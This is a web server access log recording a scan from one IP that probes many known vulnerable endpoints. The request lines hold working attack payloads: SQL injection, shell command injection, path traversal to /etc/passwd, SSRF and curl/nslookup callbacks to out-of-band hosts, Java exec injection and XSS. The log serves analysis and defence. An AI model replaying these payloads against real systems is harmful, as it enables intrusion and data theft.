[24/Apr/2025:11:00:13 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:00:16 -0400] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:11:00:21 -0400] "GET /wp-json/post-smtp/v1/get-log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 154.84.62.234 - - [24/Apr/2025:11:00:31 -0400] "GET /php/ztp_gate.php/.js.map HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:00:33 -0400] "GET /users/sign_in HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:11:00:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:01:14 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 154.84.62.234 - - [24/Apr/2025:11:01:20 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:01:27 -0400] "GET /model-versions/get-artifact?name=2w9rfVXR1h8ncpqxS1HJaxg02tE&path=etc%2Fpasswd&version=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:01:42 -0400] "POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:01:56 -0400] "POST /classes/common/busiFacade.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.24" 154.84.62.234 - - [24/Apr/2025:11:02:14 -0400] "POST /api/file/formimage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:02:36 -0400] "POST /assets/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.18" 154.84.62.234 - - [24/Apr/2025:11:02:48 -0400] "GET /wp-content/plugins/user-meta/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:03:36 -0400] "POST /v6.58/Products/Authentication HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:03:58 -0400] "POST /Tool/uploadfile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:04:07 -0400] "GET /home/utbco.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:11:04:36 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:04:44 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:11:04:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:04:53 -0400] "GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - {{username}} [24/Apr/2025:11:05:17 -0400] "GET /api/v3/user/orgs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:05:27 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:05:29 -0400] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:06:22 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14" 154.84.62.234 - - [24/Apr/2025:11:06:55 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.8.25" 154.84.62.234 - - [24/Apr/2025:11:06:55 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ifconfig;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:06:56 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;id;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.4" 154.84.62.234 - - [24/Apr/2025:11:06:56 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;ifconfig;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:06:59 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:11:07:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:07:22 -0400] "POST /index.php/display/status_zigbee HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:11:07:27 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:07:58 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:08:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:09:10 -0400] "GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.18" 154.84.62.234 - - [24/Apr/2025:11:09:21 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:09:26 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.12 (KHTML, like Gecko) Version/17.3 Safari/617.12" 154.84.62.234 - - [24/Apr/2025:11:09:32 -0400] "GET /?__wpdmxp=%27][/wpdm_package][wpdm_all_packages][wpdm_package%20id=%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:09:32 -0400] "GET /file=http://oast.pro HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:10:56 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:11:35 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:12:08 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:12:08 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.18 (KHTML, like Gecko) Version/17.4 Safari/617.18" 154.84.62.234 - - [24/Apr/2025:11:12:26 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:12:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:12:35 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:11:12:38 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:19 -0400] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:29 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:41 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:13:42 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:13:52 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:14:10 -0400] "POST /component_server HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:11:14:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:14:27 -0400] "POST /wp-json/notificationx/v1/analytics HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - cslu-windows-client [24/Apr/2025:11:15:13 -0400] "GET /cslu/v1/scheduler/jobs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 154.84.62.234 - - [24/Apr/2025:11:15:34 -0400] "POST /queue/join HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:15:37 -0400] "GET /queue/data?session_hash=2w9rfQ7frfFFqUrrs6jWurLHObt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:11:15:38 -0400] "GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.7 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:09 -0400] "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:21 -0400] "GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:35 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:16:57 -0400] "POST /login?next=https://mgrokokbet.id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:17:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_7; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:17:54 -0400] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d04qr7ij4pq19d75k490sgnmr69tp6xqo.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:17:58 -0400] "POST /dana-ws/saml20.ws HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:18:05 -0400] "POST /dana-na/auth/saml-sso.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:18:06 -0400] "POST /task/submit/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:18:17 -0400] "POST /ajax/ticket_user_db.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:11:18:55 -0400] "GET /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.0) AppleWebKit/617.28 (KHTML, like Gecko) Version/17.0 Safari/617.28" 154.84.62.234 - - [24/Apr/2025:11:18:58 -0400] "POST /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:19:05 -0400] "GET /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" 154.84.62.234 - - [24/Apr/2025:11:19:08 -0400] "POST /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:19:10 -0400] "POST /protocol/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:19:40 -0400] "GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,1499aadeaba2dd8efa4dbc04eb0cc04e,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:11:19:55 -0400] "POST /ajax/calendar.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:20:17 -0400] "POST /app/rest/users/id:1/tokens/2w9rff1ymIwq6Q8bLXsgoX1rDGQ;.jsp?jsp_precompile=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:21:35 -0400] "POST /_sql?types HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:21:41 -0400] "POST /_sql?types HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:21:42 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:21:48 -0400] "POST /_sql?types HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:22:32 -0400] "POST /clients/MyCRL HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:22:39 -0400] "GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.3.25" 154.84.62.234 - - [24/Apr/2025:11:22:40 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:22:50 -0400] "POST /gremlin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:22:57 -0400] "GET /importexport.php?sql=c2VsZWN0KzksbWQ1KDk4MzA1OTYpLDk=&type=exportexcelbysql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:23:10 -0400] "POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:23:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:11:23:28 -0400] "PUT /goform/AccessControl HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.8.22" 154.84.62.234 - - [24/Apr/2025:11:23:32 -0400] "GET /kqn6d.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:23:32 -0400] "GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgZDA0cXI3aWo0cHExOWQ3NWs0OTBhY2hveWo3OTN5YW16Lm9hc3Qub25saW5l%22))) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:24:11 -0400] "POST /flash/addcrypted2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.16" 154.84.62.234 - - [24/Apr/2025:11:24:13 -0400] "GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:24:31 -0400] "POST /wp-admin/admin-post.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - helpdeskIntegrationUser [24/Apr/2025:11:24:39 -0400] "GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:24:42 -0400] "GET /wp-content/plugins/LayerSlider/assets/static/public/front.css HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:11:25:17 -0400] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:25:25 -0400] "GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:11:25:34 -0400] "POST /save.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:11:25:37 -0400] "GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:25:42 -0400] "GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 154.84.62.234 - - [24/Apr/2025:11:26:48 -0400] "POST /WSStatusEvents/EventHandler.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:27:05 -0400] "GET /streampipes-backend/api/v2/auth/settings HTTP/1.1" 200 0 "-" "2w9rfRhI92eODASuCRMGXnahhP8" 154.84.62.234 - - [24/Apr/2025:11:27:08 -0400] "POST 